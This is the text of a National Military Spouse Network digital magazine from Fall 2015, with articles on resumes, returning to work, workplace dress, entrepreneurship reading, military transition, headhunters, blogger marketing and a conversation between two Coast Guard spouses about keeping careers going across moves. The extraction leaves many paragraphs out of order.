Janet Farley serves as a NMSN subject matter expert and she is the author of The Military Spouse’s Employment Guide: Smart Job Choices for Mobile Lifestyles (Impact Publications, 2012). For more military spouse employment tips and thoughts, follow her @Smartjobchoices on Twitter.
Length matters. Consider the employer before you expand your resume past two pages. If you are targeting a job within the federal government, go into adequate detail and don’t stress over how many pages it takes. Stress over the content. The average federal resume is four to five pages long. If you have a ten or more page resume, then you probably said too much. If you are targeting a job in the private sector, keep it to no more than two pages unless instructed otherwise by the employer. Highlight the skills you have to offer. Don’t get caught up in all the skills, abilities or experiences that you don’t have. Instead, sell what you do have. It’s you. If you’re not happy with what you have to offer, then that is a different situation requiring different action.
Visit us online at
14
THE HOUSE IS MESSIER AND
I Don’t Care
by Carol Fishman Cohen
Ten years ago when Vivian Steir Rabin and I were doing the research for our career reentry strategy book Back on the Career Track (Hachette, 2007, Amazon 2011), we conducted over one hundred in-depth interviews to understand every detail about transitioning back to work after an extended career break. At the time, we focused primarily on moms returning to work after career breaks for child care reasons. Both Vivian and I returned to work after our own career breaks home with children, but we didn’t want to rely only on our experiences. The discussion of managing day to day logistics upon returning to work brought out excellent and sometimes humorous responses. From Visit us online at
household cleanliness, to lack of personal time, to the realities of carpools and childcare, return-to-work moms give us frank and helpful advice.
HOUSEHOLD CLEANLINESS “My house is messier and I don’t care!” “You’ve got to let go of domestic perfection.” “I feel that if I am working, things that are undone at home really don’t bother me as much. Like those pictures that have been leaning against the wall for the last two years that need to be hung.” 15
The chorus of voices citing the lowering of household cleanliness standards came across loud and clear. When moms returned to work, they decided to be less picky about how clean their houses were and they were much happier for it.
every day, which was the gap between when the kids got home and when I got home. I found two thirteen-and-a-halfyear-old girls in my neighborhood who were best friends to provide this coverage. They guaranteed that one of them would be available to cover this time slot every day. They were there, without fail, every afternoon for two years. I could never have done this without them.”
ANOTHER PERSPECTIVE “Since I went back the household stuff is definitely more out of control. Now we all rush out of the house at the same time, and there is no one to clean up the dishes and food left on the table. Beds are unmade. There’s no one to go around and straighten up and clean. This is especially hard when my mother-in-law is visiting. She tends to judge me by how I keep or do not keep up the house.”
CARPOOLS “We were in lots of carpools, and with six kids, both of us drove them. Our deal with the other parents was O’Briens would do the morning carpools, and other families would do the afternoon. Sometimes I’d be at a corner dropping off three of the kids, and I’d see Tom whizzing by with his car pool!”
MEAL PREPARATION
(Note: This quote is from Ruth Reardon O’Brien, Conan’s mom, who has the most amazing relaunch success story from the 1970s. This quote was from an interview of Reardon O’Brien by Heather Peddie in an account originally for the Stanford Law School Women’s Legal History Biography Project.
“I do a lot of Crock-Pot cooking. One night a week we have sandwiches for dinner. One night a week we have what we call ‘Sonoma Night’; a cold meal of with cheese, fruit, bread, boiled eggs, cold veggies, leftovers. We barbecue a lot. Sometimes the kids make dinner on their own with canned soup, frozen dinners and fresh fruit.”
I also interviewed Ruth Reardon O’Brien.)
“We have a lot of pasta for dinner now, or eggs, or even cereal and fruit when I can’t get around to making anything.”
You’ve got to let go of domestic perfection.
CHILDCARE “I needed coverage from 4:45 to 6:00 pm Visit us online at
16
were being served, as long as something was planned. At first my seventh grade son balked, but he later became quite possessive of ‘his’ dinner night.”
How returning to work feels “in the moment” (quote from a relauncher one month before she went back): “I’m feeling tremendous uncertainty, a tremendous urgency before I get everything in place before I start work again. Now I’m realizing all the roles I really had. [We had a family meeting.] I told the kids they owed the family 30 minutes of helping-out time every day.”
“…I was nervous about how they would manage without me. Fed up one morning, I decided to take…inaction. I stayed in bed and let the children run through the morning routine themselves. Well, the kids (ages 13 and 10) made their breakfasts and lunches themselves and left on their own. It was a lesson to me. It was as if someone turned the light on. I realized that a 10 year old making her own breakfast and going to the bus by herself can be a good thing. She’s developing competencies she wouldn’t have developed if I were always around. I think about it in terms of competencies developed in the absence or presence of parents.”
(Note: This relauncher has now been back at work for ten years.)
TIME MANAGEMENT “What I sacrifice is personal time. My out-of-work peer relationships are gone. I never see my women friends anymore. Exercise is really reduced or gone. That’s an okay trade-off for me right now. Some of my social needs are met at the office.”
“Donna’s decision to go back to school and then to take a position as an ESL teacher caused drastic changes in the routines of her son and daughter. She worked only four hours a day, Monday through Friday, but she had to leave for work right after her son’s wake up time. (Her 14 year old daughter left for the school bus before her son woke up.) Her 11 year old son had to make his breakfast, set the alarm, lock the house, and get himself to the bus all on his own. He was only in fifth grade. Her friends couldn’t believe she would let him do this, but Donna felt he was mature enough to handle it.”
“It takes a monumentally important event for me to be out on a weeknight. I say no to almost every evening request for my time, whether it be a fund-raising event, dinner with friends, or a college alumni get-together. I will admit I made an exception for the Paul McCartney concert!”
KIDS GAINING INDEPENDENCE “We told the kids they were each responsible for making dinner one night a week. This included coming up with the ingredient list in time for our once a week grocery shopping trip on Sundays. It didn’t matter if boiled pasta and water Visit us online at
I hope you find these quotes and anecdotes as inspiring and instructive as
17
I do. This wisdom could only come from moms who have lived through a return to work窶馬o sugar-coating here! For more advice and information about returning to work after a career break, consult the resources at iRelaunch.com
Visit us online at
Carol Fishman Cohen is a globally recognized expert on career-reentry strategy. She is coauthor of Back on the Career Track: A Guide for Stay-at-Home Moms Who Want to Return to Work and co-founder of iRelaunch (. com),.
18
Visit us online at
19
FIRST IMPRESSIONS
Do Matter by Joyce Neave
You never know who you are going to meet. Think of yourself as a walking billboard. The way you present yourself is how people connect to you. Do your clothes fit you well? Are they clean and pressed? Studies show that people have confidence in individuals who take pride in the way they dress. This does not mean that you have to break the bank to look good. It means that your clothes are the right size and tailored to fit your body. It means you’re dressed appropriately for the situation. For example, it means that you wear closed toe shoes to a job fair, and save the flip flops for the beach.
Visit us online at
20
Dressing well and appropriately tells the world that you are a good decision maker; that you have good judgment. This will not only build people’s confidence in you at the work place but in every setting. Most importantly, you will feel good about yourself.
TIPS ON PRESENTING YOURSELF WELL • When shopping for your work attire, it’s best to simplify. Basic suiting in solid colors should be made well and tailored to fit your body. • Take care of your clothing by dry cleaning your suits. In between trips to the cleaners, try steaming your suits with an electric steamer. You can purchase a free standing or hand held steamer. This will take out the wrinkles and keep your clothing smelling fresh.
Businesses want to hire people who will represent their company well. Ask yourself,” Do I reflect their brand?” What you wear to work shows how you feel about the company. Do you show up fresh and ready to do your job? Do your clothes convey that you are part of the team? Everyone wants to express themselves and be heard. In a business setting, this is achieved by your ideas not your clothing. Companies have reputations. Intelligent, well-mannered, well dressed employee make the company look good. Save your creative dressing for the weekend.
Visit us online at
• Shirts/tops should be free of tears, snags, stains and should always smell fresh. Cologne will not take away body odor or food smells and definitely not the smell of smoke. It will only smell worse. • Practice good personal hygiene. Bathe regularly, use deodorant, brush your teeth and visit your dentist for regular cleanings. Be well groomed. Nails should be trimmed and clean. If you wear polish, chipped polish should be repainted or removed. Hair should be groomed and clean when you arrive at work.
21
• Shoes should always be clean polished and heels and soles should be repaired when needed..
• Keep jewelry to a minimum and avoid jewelry that jingles. • If you’re working in a more conservative setting, tattoos and piercings should be covered in the work place until you’re more familiar with the culture of the company and get a better handle on what’s acceptable. This is a topic that is worth revisiting often. Why? Because it can change your life. Though that sounds dramatic, it’s actually true. First impressions DO matter. Following these tips will get you in the door. Once you’re in, your hard work and best efforts will speak for themselves.
Visit us online at
22
PUT YOUR BEST
Foot Forward by Amy Schofield, ACRW
Military spouses may be faced with numerous employment challenges. Multiple moves typically result in searching for new jobs, possible gaps on resumes, and potential certification issues. Because of this, military spouses often times have a difficult time obtaining employment, making it even more important for military spouses to put their best foot forward on their resume.
2. Make sure you understand what each employer is looking for and that your resume clearly highlights the specific skills and experiences that the employer is seeking.
BELOW ARE TEN RESUME TIPS TO HELP YOU GET IN THE DOOR:
4. Address any gaps. As a military spouse, you may have additional gaps from moving around, so ensure you address these gaps. Volunteering is one great way to address any potential gaps.
3. Review your resume to ensure you are highlighting your strongest accomplishments that set you apart from other job applicants.
1. Adapt your resume to each position you’re applying to.
Visit us online at
23
5. Choose quality over quantity. It is generally better to send 10 tailored resumes than to apply to 100 jobs using a general resume.
Amy Schofield, founder of Schofield Strategies [], works one”. [. com/e-books-resources/]
6. Know how to get past applicant tracking systems. Use proper key words for the type of job you are applying to. 7. Never use your email address with your current employer on your resume. (And speaking of email addresses, make sure that the one you are using is professional). 8. Do not include your physical street address, city, state, or zip code if you are applying to a job in your new duty location and you do not have an address there yet. (So, ONLY include your address if you are applying to a local position). 9. Before sending your resume, proofread it. And then proofread it again. Be sure your resume is 100% error-free. 10. Honesty is critical! Never, never, never lie on your resume.
Adapt your resume to each position you’re applying to.
Remember, the goal of your resume is to put your best foot forward – let the employer know why they want YOU over another job applicant. Make sure you place more emphasis on your actual job accomplishments, tailor your resume for each position you apply to, use industry lingo, and proofread (and then proofread again!).
Visit us online at
24
THE MORE
You Know
by Matt Zemon
Every entrepreneur starts his or her business from square one- just like you. Once started, all of their time and energy goes into to growing the business.
This month I am offering some suggested reading for military spouse entrepreneurs. They are written by thought leaders that were introduced to me through EO and cover a variety of topics that can help entrepreneurs of any size. Getting back to square one, let’s start with the beginning of a business. Sound planning can make or break a new company, but it doesn’t have to be daunting. The three sources I cite on this subject offer great suggestions and tools. Eric Ries is the creator of The Lean Startup and he offers a process to empower entrepreneurs to make better business decisions faster. His scientific
As the entrepreneur-in-residence for the National Military Spouse Network, I am always looking for ways to help military spouses start or grow businesses. An important resource for me has been the Entrepreneurs’ Organization (EO). This organization provides small accountability forums and knowledge sharing for entrepreneurs around the world. (For those of you with $1 million or more of annual revenue check them out!)
Visit us online at
25
approach to creating and managing startups streamlines the process. The Startup of YOU focuses on the human side of entrepreneurship. Reid Hoffman, Co-founder and Chairman of LinkedIn and Ben Casnocha, an Entrepreneur and Author cover the mindset and skill set that are needed by today’s startups. The Business Model Generation by Alexander Osterwalder and Yves Pigneur takes a colorful and visual approach to strategy and planning. Their Business Model Canvas is a simple, but effective template that allows you to create a customized model of your business, whether it is a startup or a going concern.
for and what is expected of every member. Peak: How Great Companies Get Their Mojo from Maslow, by Chip Conley is a great look at what motivates employees, customers, bosses and investors. He provides ideas on how to use that knowledge to strengthen relationships. Those relationships are at the core of a strong and profitable business. When it comes to generating business, there is a lot of advice out there about promotion. Seth Godin has written a number of great books including Purple Cow, New Edition: Transform Your Business by Being Remarkable, which identifies what makes a product/company noticeable in a sea of marketing messages. In Double Double: How To Double your Revenue and Profit in 3 Years Or Less, Cameron Herald addresses the three steps to success: Planning, Building and Leading. As the former COO of 1-800-GOTJUNK, he played a key role in building a great company. One key element for his company was generating free media exposure through an inexpensive public relations strategy, which he describes in detail in Double Double.
Once you are confident about your plan, the management elements needed to execute it should receive your thoughtful attention. Once again, there are many sources of information that can be helpful. Mastering the Rockefeller Habits: What You Must Do to Increase the Value of Your Growing Firm, by Verne Harnish, gets back to the fundamental best practices you can use to gain focus and align employees and vendors. His one page Checklist and a number of other resources and helpful videos are available online.
A well-known trait common to Hiring great people isn’t easy, but it doesn’t have to be hard. Geoff Smart and Randy Street wrote a fantastic book called Who that can help anyone make better hiring decisions.
Sound planning can make or break a new company.
Once you have hired employees, don’t forget to spend time on your company culture. Define what the company stands Visit us online at
26
entrepreneurs is a thirst for learning. I hope these reading suggestions will quench your thirst for a little while.
Visit us online at.
27
Visit us online at
28
T RANSITION by Sue Hoppin
Toward the end of August, I had the honor of participating in the #morethanaspouse Facebook party hosted by the National Military Family Association. By the time the party was over, I had answered nearly 300 questions on everything from careers, entrepreneurship to transition. An hour wasn’t quite long enough to share all the tips and thoughts about successful transitioning out of the military lifestyle so I wanted to follow up with a wrap up and throw in some other tips gleaned from our own transition a little over two years ago.
Don’t kid yourself—you’re BOTH transitioning. Your service member spouse is leaving the military and you are leaving the active duty lifestyle. There’s a lot of fear and anxiety that comes with that. The good news is, it’s normal. Take it easy on yourself and understand that this is a very stressful time overall. Do what you can to be proactive. Attend the transition seminar together. Up until now, you’ve been the ultimate intel gatherer/gatekeeper—transition is no different. You’d be amazed at how much information is thrown at you during those seminars. It doesn’t hurt to take the team approach and compare notes at the end of
TIPS FOR A SUCCESSFUL TRANSITION (LEARNED THE HARD WAY) Visit us online at
29
the day.
Take advantage of all the employment resources on the installation while you can. Many of the resources and programs you’re used to are not available to retirees or veterans and their dependents, so make sure you get those appointments and counseling sessions in while you can.
Understand your benefits. The Survivor Benefit Plan is just the tip of the iceberg. You should review your other benefits such as TriCare and dental to make sure you understand how your new coverage will work once you transition.
Update your resume. Even if you have no interest in working, you never know when an opportunity might arise and you want to be ready. Don’t wait until you need it to get your resume ready. Be proactive!
Make sure your finances are in order. Many people recommend having six months’ living expenses readily available for post transition life. Try to have at least three to four months’ worth of living expenses available to alleviate undue stress. This means, start as early as you can to put away that fund. If you maintained residency in a state that didn’t tax personal income tax while on active status, but are now establishing residency in one that does, it can be jarring. It takes some time post transition to get used to the fees and taxes of settling into your new state of residency. We’re a little over two years into our transition and just now feel like we’ve acclimated to our new financial reality. It takes time. And it’s stressful. The only way to mitigate that stress is to be prepared.
Order networking cards. Companies like Vistaprint are constantly running sales, so you can get hundreds of networking cards for a song. Not sure where you’ll be living post transition? No worries, just leave the address off. You’ll want to have networking cards handy as you start meeting people. Start or update your LinkedIn profile. LinkedIn is a great way to stay in touch with all of your contacts in a professional manner. Start attending career fairs together a couple years before the transition. You
You’re BOTH transitioning. Your service member spouse is leaving the military and you are leaving the active duty lifestyle. There’s a lot of fear and anxiety that comes with that. The good news is, it’s normal.
Visit us online at
30
want to get that dress rehearsal in before it counts. Consider it a reconnaissance mission—it’s good to get the lay of the land and figure out how to interact effectively with recruiters before it counts. It’s also a great way to gauge what kind of opportunities are out there and what employers are actively seeking to hire veterans and military spouses.
Sue Hoppin is the founder and president of the National Military Spouse Network, a consultant on military family issues and the co-author.
Network, network, network. Network not just for that next career opportunity, but also to find your “tribe”. Find those people who have recently transitioned who can offer some fresh insights because they have just gone through it. They’re going to become your new lifeline because they have successfully navigated the transition. They’ll be a great reminder for you – there IS life after the military. You’re going to be stressed, scared and anxious, but it will pass. These are just tips to get you started. If you have any to add, drop them in the comments of the blog post. If you’re going through transition soon, think about joining us for the our summit [link to www. milspousesummit.com] in November, particularly the Networking event on the 13th that will be focused on a Successful Transition. Service member spouses are more than welcome. It’s a great, low threat environment where you can relax and speak to military friendly employers and others who are either going through the transition themselves or have recently successful transitioned. Hope to see you there!
Visit us online at
31
USE YOUR
B.R.A.I.N. by Carol Bowser, JD
R = RISKS
The B.R.A.I.N. technique takes the best negotiation, collaboration, and problem solving techniques and literally puts them at your fingertips. 5 fingers. 5 points. Here we go:
Think of all the risks associated with that same course of action. Again, these are all types of risks: time, emotional risks, financial risks, risks to the family, risk to an employer or to a team.
B = BENEFITS
A = ALTERNATIVES
TThink of all of the benefits to you in taking a specific course of action. I mean all of the benefits: emotional, spiritual, professional, and financial. If the idea impacts your work, what are the potential benefits to the employer? What are the potential benefits to society as a whole? Quickly write all of the benefits down. Visit us online at
What are alternative courses of action that could achieve the same or nearly the same results? This is the time to write down even the wildest, least feasible ideas. If you can’t think of alternatives, describe the situation to someone who is not involved and write down their ideas. You
32
aren’t at the place to make a decision, yet so don’t worry about committing to any alternatives. You are merely brainstorming.
B.R.A.I.N. allows everyone to be heard, have their say, and come to a decision..
I = INTUITION Now it is time to check in with your gut. What does your gut tell you? Do you like the idea? Are you having a bad or uneasy feeling about it? Your intuition is a valuable tool. Don’t discount it.
N = NOTHING Yes, nothing. What would happen if you did nothing? What would happen if you delayed a little? Nothing is an option. It may not be a viable option or it may be the best option. Sometimes maintaining the status quo is perfectly fine. After running thought the B.R.A.I.N. analysis you are ready to present your ideas. You can confidently say, “I have thought of the Benefits, Risks, and Alternatives in the situation. Did a gut check and here is where I land.” Now, if someone comes to you with an idea, you can help yourself come to a wellreasoned decision by having that person walk you through the B.R.A.I.N. analysis. For example: “Ok, so you want to do (fill in the blank), can you walk me through the benefits of that? What do you see as the Risks? What alternatives did you think of? What does your gut say? What might happen if we put off the decision for a little while?”
Visit us online at
33
WORKING WITH
Head Hunters by Julie Waters
JW:
Headhunters can be a valuable tool in your employment search. Since I personally have never had the opportunity to work with a headhunter, when prepping for this article, I sat down with Corinda BehlerHowe, Branch Manager for Office Team, a division of Robert Half International. From their own website, Robert Half International, “specialized staffing divisions place professionals in the finance and accounting, information technology, legal, administrative, and marketing and creative industries.” Office Team specializes in placing highly skilled office and administrative support professionals.
Let’s start with the basics. What is a headhunter?
CBH: On a very basic level a headhunter is a person who can help you find a job. On a deeper level, a headhunter or recruiter is one more resource to help you in your employment search. As recruiters have connections with organizations looking for the right applicant, working with them helps expand your pool of opportunities.
JW: What types of professions typically run through a headhunting firm or placement
Visit us online at
34
CBH:
agency?
It is a recruiter’s job to build relationships on both sides of the process. On the job seeker side it would begin with interviewing perspective candidates to find the right fit for an organization’s needs. Keeping in mind that each communication with the candidate is part of the interview: all phone calls, e-mail exchanges, even your interaction with the receptionist is part of the big picture process. Getting to know the candidates and building that relationship will make for a better placement. I’ve found that cultural fit is just as important as specific experience.
CBH: Agencies specialize in finding the right fit, like those hard to find candidates with specific requirements as communicated by the company, so you’ll find that they are looking to fill jobs in all types of professions. Headhunters were traditionally used for direct placement positions, hiring employed people away from their current companies, but now they are more associated with temp to hire or contract positions. Though agencies do not typically handle entry level placements, there are plenty of those positions available at a professional level to include C-level positions.
As far as the timeline, I don’t think there is a “normal” process anymore. It depends on the flexibility of both the applicant and the company; it depends on how deep into the process the company wants the headhunter to go. Some just want an initial screening and interview and then the company decides to do multiple rounds of interviews. Others want the recruiter to narrow the pool down to the final few candidates. Using a headhunter firm or agency puts that old school feeling back in the mix, that face to face personal touch of the process being about the person, not the resume.
JW: Where would I find a headhunter or recruiter?
CBH: The same places you would look for jobs: the internet, phone book, your local chamber, even the base placement office. Your best bet however is a networking event that correlates with the types of positions in which you would be interested. For example, the ASWA (American Society of Woman Accountants) if that is your specialty.
JW: What does the fee structure look like?
JW:
CBH:
How does a headhunter do the job? And what about the timeline?
Predominantly the candidate does not pay a fee. The recruiter gets compensated by the company. If it is a temp to hire
Visit us online at
35
or a contract position there is an hourly billing rate and a placement fee. For direct placement a fee is negotiated between the agency and the company.
headhunter as a tool for their job search?
MC: Yes - as long as they don’t have any monetary obligation to the headhunter. The headhunters are paid by the companies to place you and you shouldn’t be paying them. It also shouldn’t be their only avenue to get a job. They should be networking and seeking out opportunities independently.
As a follow up to talking with Corinda, I had a discussion with a friend of mine who has been “hunted.” Michele Chapman is Director, Sales Operations for Philips Healthcare North America. She has a Bachelor’s Degree in Organizational Leadership from Penn State. Michele is a military brat whose father was career Air Force. It was an interesting experience for her because in her case, it was a call from a headhunter that came out of the blue.
Michele just confirmed my perspective, that using a headhunter, recruiter or placement agency should only be part of your job search. You can’t just drop off a resume and expect them to call you with your dream job. You need to be proactive with them and continue your other methods of searching.
JW: How did the headhunter find you?
MC: She found me on LinkedIn. The recruiter cold-called me after I had listed my experience and skills.
Another important thing to take away from meeting with a recruiter is that he or she is a person in your new city who has an extensive network. Even if you don’t end up using their services, that person could still serve a valuable resource. If there are long-term contract positions available in your area you will be more likely to find them through a placement agency; access to those positions may only open up through contact with the recruiter.
JW: What did you like best about the process? And what did you like the least?
MC: I liked that they had a specific job that fit my skills instead of me trying to find jobs that would interest me. What I liked least— my recruiter had poor follow up about the interview and after the interview.
I would also recommend using an agency or recruiter that has been around for a few years. If a person does a poor job of finding that elusive “fit” they won’t last long in the business. The people that have been there for a little while are probably
JW: Given your experience, if you can put yourself in the shoes of a military spouse, would you recommend seeking out a Visit us online at
36
pretty good at it.. Julie was lucky enough to choose a career that easily transfers between employers as her husband’s assignments moved them from city to city. She holds a special interest in career building for military spouses as she feels it is important to have something personal outside of our military lifestyle.
Visit us online at
37
UTILIZING
Bloggers by Greta Perry
This post was originally written in 2011 for NMSN and it still is extremely relevant in 2015. Just this past week, my personal online presence (blog and social media) has opened a gateway to do some work with Travelocity—I even have my own Travelling Gnome. At the same time, I am also contacting bloggers on behalf of an author/client. While this post has been mildly tweaked since the first draft, the importance of bloggers and marketing has only increased over time.
on 20 February 2014, there were around 172 million Tumblr[5] and 75.8 million WordPress blogs. Large companies such as Sears and USAA have realized the value bloggers can bring to their companies and actively engage them. Mike Kelly, Executive Director USAA Stakeholder Management & Mobilization, stated in 2011, when this article was originally published, that “Over the last several years we’ve seen bloggers grow in influence and impact within the military community, playing a significant role helping educate and inform USAA’s military members and their families about valuable benefits and how they can make healthy financial decisions.” Augie Ray,
Blogs are an often overlooked entity for marketing and advertising a brand or product. According to Wikipedia (one of the only sources with current blog info), Visit us online at
38
Executive Director USAA Communities & Collaboration said at the same time, “Our members trust bloggers to be objective sources of information, and so do we!”
Have several graphic sidebar ads of varying sizes ready, or just start by using a sidebar text ad. Carefully read over the blog to make sure you want your business affiliated with it. Note how long they have been blogging and how consistent they are. Take note if the blog currently offers individual advertisements—not just Google, Amazon, etc. ads on their site. Check to see if they have an existing ad or promotion policy.
If companies who can afford high dollar traditional media ads place a significant amount of energy into the blogging community, then others should certainly follow suit. Whether someone runs a blog for fun or to supplement their income (few actually use it for their primary source of income), blogs are out there for you to use to your advantage, if approached properly. Taking out an ad or offering them a free product, service for review or event tickets, is the best way to establish a business relationship with a blogger. Below are steps that will help you to achieve this successfully.
Check out the blog’s related social media presence, as this may be of added value to your purchase. You can often work social media promotions into your agreement. There is a chance at some point, that if the blogger likes your product or service, he or she may write about it or promote it on other social media platforms—an unexpected benefit. Good luck and remember, first impressions with bloggers are of the utmost importance.
Determine if you will offer something of value to the blogger and/or if an ad is the preferred method of contacting them. Approach with caution, as it only takes a second for a blogger to delete your request and time to answer it. You must stand out from the moment of contact. Decide what your advertising budget is ahead of time. Most blogs will want 6 months of an ad purchased at a time. If they do not have any ads, you could offer them shorter periods of time. Most would love some money closer to the holidays, so now is a great time to make offers. www. kickify.com.
Identify a blog whose audience reaches your targeted demographics: age, gender, area of interest, location.
Visit us online at
39
A CONVERSATION WITH
Pam Allen by Shelley Kimball
Two Coast Guard spouses from different generations shared their experiences trying to maintain careers while moving regularly: one who kept her career intact while her husband served for nearly 40 years and the other still working to keep her career afloat.
struggling for employment. Throughout those years, she took part-time positions that turned into full-time positions, as an advisor for university students to directing academic advising and career counseling centers. Shelley Kimball has been a Coast Guard spouse for 15 years and is trying to maintain her career while moving regularly. She has worked as a university professor of media law, both part time and full time, as well as a researcher for nonprofits that serve military families.
Pam Allen, whose husband, Thad Allen, retired as the 23rd commandant of the Coast Guard, maintained a career first as a math teacher, then as an academic advising at the university level. She decided to switch careers and go to graduate school to study college counseling and student development because she saw so many military spouses Visit us online at
At the time of the conversation, Allen was considering coming out of retirement to
40
take a new position with George Mason University in Northern Virginia developing a program that helps students get the most out of their university experiences by encouraging them to supplement their progression through school with work and classes that will give them better career opportunities. As she was considering taking the job, she said she was still experiencing many of the feelings she did when facing a new job as a military spouse.
going to laugh this off? Am I the right fit? So I just pressed send, and the path started. I ended up getting a job teaching at George Washington University from that email, but it was scary.
PA: And for people that don’t have that confidence, and I think everybody does to some extent, but for some for whom this is really immobilizing you, go and search for help to get that one step that you need in order to go to the next level.
PA: I’ll tell you the same thing happens right now in this decision that happens each time we had to move and find a new job, and that’s insecurities. It’s something I believe that a lot of military spouses have to conquer every single time. They get better, hopefully every time they get further on in their careers, but it’s something that stops many people from going any further.
Back at the very beginning, finding that next step wasn’t necessarily easy. The Green Sheet [a hardcopy list of Coast
Sometimes you don’t feel like you have a choice, but you’ve always had a choice to take what you were given and do what you can with it.
SK: I can completely relate. Sometimes I feel like I’m pretending, or I’m a fraud, or is this really the job I’m supposed to have? Or even applying to every job, feeling like I’m not sure.
Guard information that was mailed out] was something we could get information from, but trying to figure out how or who could give you that information was basically you stumbling along.
For the current job I have, I was drafting an email, just cold calling, saying my husband had orders, we would likely be in the area, and asking if there were any job openings. When I was about to send that email, I literally sat there telling myself, “You just have to press send. Just press send. Be brave, press send.” Because I thought, am I good enough? Are they Visit us online at
SK: Maybe that’s the difference now between us. In your time of doing this, you were going to paper and trying to find human
41
beings, where I am Googling. I’m using LinkedIn, I’m emailing. And so for me, it’s really probably 20 minutes at a computer to find my pathway. But for you, I don’t even know how long it would have taken you to track down even the person to send the letter to.
Send letters from people who can tell you that as an advisor, I work just as effectively as director.
SK: I’m having the same career experience. I was director of the print program of the journalism department at a university, then I couldn’t find a job at the next duty station.
PA: You’d go through papers, and you’d look through the want ads. Does anybody use the want ads now? It was highly frustrating and unproductive.
So I really had to change my perspective. I feel like I broke apart my skill set. I thought, what do I enjoy? If I’m sitting in my office all day, what are the things I’m wishing I were doing instead of sitting at a desk? Research and working more with military families were two of the priorities. I guess I was gifted with unemployment because I started doing research for military family nonprofits, and it filled that void for me.
Becoming a career counselor, I discovered all these resources that are out there that I didn’t know existed. I bet you if you go and work with some of the spouses, they don’t know it’s there. They don’t know where to look. Or they looked once and it wasn’t good for them so they never went back to look at it. You just have to keep checking back. Or you have to ask if you don’t find it because it probably is there, and somebody’s going to help you find the right place to look.
When we were getting ready to transfer again, I really felt awful about starting over. I was tired. That’s when I sent that email—just be brave and press send. And what came back was a part-time opening teaching directly in my field. And so, though it’s lower in stature to my old position, I’m still so happy and satisfied. I’m with the students teaching what I love.
Throughout both of their careers, they have taken jobs at higher ends of their careers, and then when a move came, they would start back at the bottom.
PA: And when you do that, you sit there and say, “How do I tell people I used to be an associate director. Why would they want to hire me in a lower position?” And so with our military moving situation, I’d have people send references of individuals that showed that I work with everybody else. Visit us online at
Maybe this will be the seed to the larger thing, like your part-time jobs were. And instead of saying no to the smaller position, maybe something else will come.
PA: You should always do that. And what you
42
SK:
bring each time. There’s a life after all the moves.
I’m totally of the same mind. My career has become such a patchwork I feet like I need to explain why I am always someplace different. It’s not a work issue, it’s a life issue.
Both have tackled the question, “Do I reveal that I am a military spouse?”
SK: When you were applying for jobs and interviewing, did you always say you were a spouse?
PA:
PA:
SK:
That is a very interesting question. Yes. And not only that, I made it an issue.
I feel that, too. I feel dishonest if I don’t say.
What you get with a military spouse is consistency. We don’t tend to flip from job to job because we are only here fore a few years.
PA:
You don’t appear to be hiding anything if you do that.
They are looking for dishonesty. When you don’t put your times of work experience, dates, why aren’t you doing that? You are trying to hide something. It’s better to put them down there. And I help people write their resumes, and I say if you change a lot, if you don’t put the dates down there, they say, “What is she trying to hide?” It’s an honesty issue that I think is to your benefit.
I would say in my cover letter quite often, I am a trailing spouse, and my husband is being transferred to this particular area, and I am very interested in your position. I would say this up in front because the worst thing is that they could get you in there, and then they find out. I’ve always been up front.
SK: And what do you think are the most valuable parts of all of this? What do you think are the strongest things to have when looking for a position as a spouse? Experience, honesty, enthusiasm, work ethic, education? Are there any that weigh more?
In some cases it’s beneficial. One of the things I think everyone should say is what I bring to every new organization is the ability to look at it with new eyes. I could bring in change. I come with a wealth of information about all of the possibilities that are out there and hopefully we can work with what is there and make it a better organization. That’s a pretty big selling point.
Visit us online at
PA: Adaptability is probably what we have more than others. We must be go-getters. We’re out there getting a new job every
43
two to three years. We must be able to adapt and do well. Adaptability. Change. I think those are the things that you need to show, say, in a cover letter for those who are asking for cover letters. And have somebody look at your cover letter. Know how to say it and what to say and how to say it, and not in 10 pages.
do what you can with it. I think I learned this from my husband. I asked him, “How do you get to be an admiral? And he says, ‘Take whatever job you have, and make the best out of that job, even though it may not be the one you want at that particular time. Because the next step could be that opportunity.”
Is there a silver lining? And it happens. It does happen. Even with military spouses.
SK: Are there positive aspects to moving?
PA: I think it’s positive because you move. It isn’t a negative. It feels negative. It feels really negative. Believe me, I’ve cried when I didn’t get a response just like everybody else. I went through the whole thing, but moving actually is a positive. If you don’t like where you are working, you know you are eventually going on to the next, possibly better, job. If you do like where you are working, you still could be going on to the next better job with experiences the new organization wants. Is it easy? No. There’s a lot of work involved in it. And I’ll admit, sometimes I was lazy. I was just tired of working and putting myself out there. But you have to work on sharing your passion and excitement to make the best impression. I am who I am because of what has happened. In reality, everyone is. So you’ve always had a choice, all along the way. Sometimes you don’t feel like you have a choice, but you’ve always had a choice to take what you were given and Visit us online at
44
NATIONALMILITARYSPOUSENETWORK.ORG
|
https://issuu.com/nmsnetwork/docs/nmsn_fall_2015_emag?utm_source=Campaign+Created+2015%2F11%2F06%2C+10%3A58+AM&utm_campaign=Fall+2015+magazine&utm_medium=email
|
CC-MAIN-2020-34
|
refinedweb
| 10,390
| 72.36
|
Starting my blog again
So this is my blog, rebuild again.
After all these years and redoing all again and again. And going from Joomla, WordPress, Angular, and a lot f different flavors. I am redoing it again using the latest and greatest from Jam stack (Or, so they say).
But the question remains, Why?
So what behind the idea of rebuilding the blog and site again.
Well first explore new technologies and apply the to my day to day and second, I always want some sore of easy, simple way of working with my site that also did not bring more administration overhead.
So, welcome Jam stack, in this case I am using DOCUSAURUS, some react and as simple CI/CD chain to be able to manage, update and push changes to the site.
Some of my requirement for this project were:
- Easy peasy lemon squeezy, simple to maintain.
- To have a simple, easy way to manage my blog and public documents.
- Fast fast fast, as fast as possible.
- Cheap, cheap, as possible.
- Where I can play with all my tools (Angular, React, Vuejs, CI/CD, and other wonders)
- Where I can add and share code, images and live examples (see examples at the bottom).
- Where I can maintain a document base of all that I am studding, reviewing and investigating and that can help others (so it is public).
- A place to make and have my CV visible online, where I can have something like a portfolio and an easy contact me page.
So lets see what happens, more to come
On the next post, technology used (Jam stack and deploy process), how I did this inexpensive site, what I use to write and maintain it.
-- moplin.
Examples.
import React, { Component } from 'react'; import { render } from 'react-dom'; import Hello from './Hello'; import './style.css'; class App extends Component { constructor() { super(); this.state = { name: 'React' }; } render() { return ( <div> <Hello name={this.state.name} /> <p> This is just a simple test from stackblitz :). I will be enbeding stuff this way. </p> </div> ); } } render(<App />, document.getElementById('root'));
|
https://moplin.com/blog/2020/05/25
|
CC-MAIN-2022-27
|
refinedweb
| 348
| 72.87
|
